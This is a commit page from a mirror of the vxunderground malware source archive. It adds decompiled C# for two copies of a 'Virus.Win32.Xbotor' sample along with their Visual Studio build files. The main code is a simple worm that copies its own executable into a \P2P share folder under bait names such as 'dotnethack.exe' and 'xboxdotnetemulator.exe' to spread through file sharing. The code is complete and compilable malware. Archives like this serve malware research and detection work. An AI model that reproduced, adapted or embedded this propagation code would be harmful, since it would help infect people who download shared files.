mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2026-06-16 15:59:24 +00:00
auto-decompiled msil via petikvx
add
This commit is contained in:
+3
@@ -0,0 +1,3 @@
|
||||
using System.Reflection;
|
||||
|
||||
[assembly: AssemblyVersion("0.0.0.0")]
|
||||
+36
@@ -0,0 +1,36 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.Win32.Xbotor-45fa2a41d7300814fe94d0eb8fc1f81a9565ff1e28ba2d1973bb5cb1bac62fea.exe-->
|
||||
<PropertyGroup>
|
||||
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
|
||||
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
|
||||
<ProjectGuid>{1AD7C55B-3266-46AF-B059-E4B048577417}</ProjectGuid>
|
||||
<OutputType>Exe</OutputType>
|
||||
<AssemblyName>p2p</AssemblyName>
|
||||
<ApplicationVersion>0.0.0.0</ApplicationVersion>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
|
||||
<PlatformTarget>AnyCPU</PlatformTarget>
|
||||
<DebugSymbols>true</DebugSymbols>
|
||||
<DebugType>full</DebugType>
|
||||
<Optimize>false</Optimize>
|
||||
<OutputPath>bin\Debug\</OutputPath>
|
||||
<DefineConstants>DEBUG;TRACE</DefineConstants>
|
||||
<ErrorReport>prompt</ErrorReport>
|
||||
<WarningLevel>4</WarningLevel>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
|
||||
<PlatformTarget>AnyCPU</PlatformTarget>
|
||||
<DebugType>pdbonly</DebugType>
|
||||
<Optimize>true</Optimize>
|
||||
<OutputPath>bin\Release\</OutputPath>
|
||||
<DefineConstants>TRACE</DefineConstants>
|
||||
<ErrorReport>prompt</ErrorReport>
|
||||
<WarningLevel>4</WarningLevel>
|
||||
</PropertyGroup>
|
||||
<ItemGroup>
|
||||
<Compile Include="p2pdotnet.cs" />
|
||||
<Compile Include="AssemblyInfo.cs" />
|
||||
</ItemGroup>
|
||||
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
|
||||
</Project>
|
||||
+20
@@ -0,0 +1,20 @@
|
||||
|
||||
Microsoft Visual Studio Solution File, Format Version 9.00
|
||||
# Visual Studio 2005
|
||||
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "p2p", "Virus.Win32.Xbotor-45fa2a41d7300814fe94d0eb8fc1f81a9565ff1e28ba2d1973bb5cb1bac62fea.csproj", "{1AD7C55B-3266-46AF-B059-E4B048577417}"
|
||||
EndProject
|
||||
Global
|
||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||
Debug|Any CPU = Debug|Any CPU
|
||||
Release|Any CPU = Release|Any CPU
|
||||
EndGlobalSection
|
||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||
{1AD7C55B-3266-46AF-B059-E4B048577417}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
|
||||
{1AD7C55B-3266-46AF-B059-E4B048577417}.Debug|Any CPU.Build.0 = Debug|Any CPU
|
||||
{1AD7C55B-3266-46AF-B059-E4B048577417}.Release|Any CPU.ActiveCfg = Release|Any CPU
|
||||
{1AD7C55B-3266-46AF-B059-E4B048577417}.Release|Any CPU.Build.0 = Release|Any CPU
|
||||
EndGlobalSection
|
||||
GlobalSection(SolutionProperties) = preSolution
|
||||
HideSolutionNode = FALSE
|
||||
EndGlobalSection
|
||||
EndGlobal
|
||||
+34
@@ -0,0 +1,34 @@
|
||||
// Decompiled with JetBrains decompiler
|
||||
// Type: p2pdotnet
|
||||
// Assembly: p2p, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
||||
// MVID: 92129E77-F6EE-43FE-93E4-918DA5687A83
|
||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.Win32.Xbotor-45fa2a41d7300814fe94d0eb8fc1f81a9565ff1e28ba2d1973bb5cb1bac62fea.exe
|
||||
|
||||
using System.IO;
|
||||
using System.Reflection;
|
||||
|
||||
internal class p2pdotnet
|
||||
{
|
||||
public static void Main()
|
||||
{
|
||||
Module module = Assembly.GetExecutingAssembly().GetModules()[0];
|
||||
Directory.CreateDirectory("\\P2P");
|
||||
string[] strArray = new string[4]
|
||||
{
|
||||
"dotnethack.exe",
|
||||
"xboxdotnetemulator.exe",
|
||||
"linuxdotnet.exe",
|
||||
"dosdotnet.exe"
|
||||
};
|
||||
foreach (string str in strArray)
|
||||
{
|
||||
try
|
||||
{
|
||||
File.Copy(module.FullyQualifiedName, "\\P2P\\" + str);
|
||||
}
|
||||
catch
|
||||
{
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
+3
@@ -0,0 +1,3 @@
|
||||
using System.Reflection;
|
||||
|
||||
[assembly: AssemblyVersion("0.0.0.0")]
|
||||
+36
@@ -0,0 +1,36 @@
|
||||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.Win32.Xbotor-78aa04a37c21e84b763d1f60bf425b89a237eddcfff4977fbbee30caa45d43d5.exe-->
|
||||
<PropertyGroup>
|
||||
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
|
||||
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
|
||||
<ProjectGuid>{F616B861-DA85-41A1-B381-0DFAE63146F9}</ProjectGuid>
|
||||
<OutputType>Exe</OutputType>
|
||||
<AssemblyName>p2p</AssemblyName>
|
||||
<ApplicationVersion>0.0.0.0</ApplicationVersion>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
|
||||
<PlatformTarget>AnyCPU</PlatformTarget>
|
||||
<DebugSymbols>true</DebugSymbols>
|
||||
<DebugType>full</DebugType>
|
||||
<Optimize>false</Optimize>
|
||||
<OutputPath>bin\Debug\</OutputPath>
|
||||
<DefineConstants>DEBUG;TRACE</DefineConstants>
|
||||
<ErrorReport>prompt</ErrorReport>
|
||||
<WarningLevel>4</WarningLevel>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
|
||||
<PlatformTarget>AnyCPU</PlatformTarget>
|
||||
<DebugType>pdbonly</DebugType>
|
||||
<Optimize>true</Optimize>
|
||||
<OutputPath>bin\Release\</OutputPath>
|
||||
<DefineConstants>TRACE</DefineConstants>
|
||||
<ErrorReport>prompt</ErrorReport>
|
||||
<WarningLevel>4</WarningLevel>
|
||||
</PropertyGroup>
|
||||
<ItemGroup>
|
||||
<Compile Include="p2pdotnet.cs" />
|
||||
<Compile Include="AssemblyInfo.cs" />
|
||||
</ItemGroup>
|
||||
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
|
||||
</Project>
|
||||
+20
@@ -0,0 +1,20 @@
|
||||
|
||||
Microsoft Visual Studio Solution File, Format Version 9.00
|
||||
# Visual Studio 2005
|
||||
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "p2p", "Virus.Win32.Xbotor-78aa04a37c21e84b763d1f60bf425b89a237eddcfff4977fbbee30caa45d43d5.csproj", "{F616B861-DA85-41A1-B381-0DFAE63146F9}"
|
||||
EndProject
|
||||
Global
|
||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||
Debug|Any CPU = Debug|Any CPU
|
||||
Release|Any CPU = Release|Any CPU
|
||||
EndGlobalSection
|
||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||
{F616B861-DA85-41A1-B381-0DFAE63146F9}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
|
||||
{F616B861-DA85-41A1-B381-0DFAE63146F9}.Debug|Any CPU.Build.0 = Debug|Any CPU
|
||||
{F616B861-DA85-41A1-B381-0DFAE63146F9}.Release|Any CPU.ActiveCfg = Release|Any CPU
|
||||
{F616B861-DA85-41A1-B381-0DFAE63146F9}.Release|Any CPU.Build.0 = Release|Any CPU
|
||||
EndGlobalSection
|
||||
GlobalSection(SolutionProperties) = preSolution
|
||||
HideSolutionNode = FALSE
|
||||
EndGlobalSection
|
||||
EndGlobal
|
||||
+34
@@ -0,0 +1,34 @@
|
||||
// Decompiled with JetBrains decompiler
|
||||
// Type: p2pdotnet
|
||||
// Assembly: p2p, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
||||
// MVID: 92129E77-F6EE-43FE-93E4-918DA5687A83
|
||||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.Win32.Xbotor-78aa04a37c21e84b763d1f60bf425b89a237eddcfff4977fbbee30caa45d43d5.exe
|
||||
|
||||
using System.IO;
|
||||
using System.Reflection;
|
||||
|
||||
internal class p2pdotnet
|
||||
{
|
||||
public static void Main()
|
||||
{
|
||||
Module module = Assembly.GetExecutingAssembly().GetModules()[0];
|
||||
Directory.CreateDirectory("\\P2P");
|
||||
string[] strArray = new string[4]
|
||||
{
|
||||
"dotnethack.exe",
|
||||
"xboxdotnetemulator.exe",
|
||||
"linuxdotnet.exe",
|
||||
"dosdotnet.exe"
|
||||
};
|
||||
foreach (string str in strArray)
|
||||
{
|
||||
try
|
||||
{
|
||||
File.Copy(module.FullyQualifiedName, "\\P2P\\" + str);
|
||||
}
|
||||
catch
|
||||
{
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
Reference in New Issue
Block a user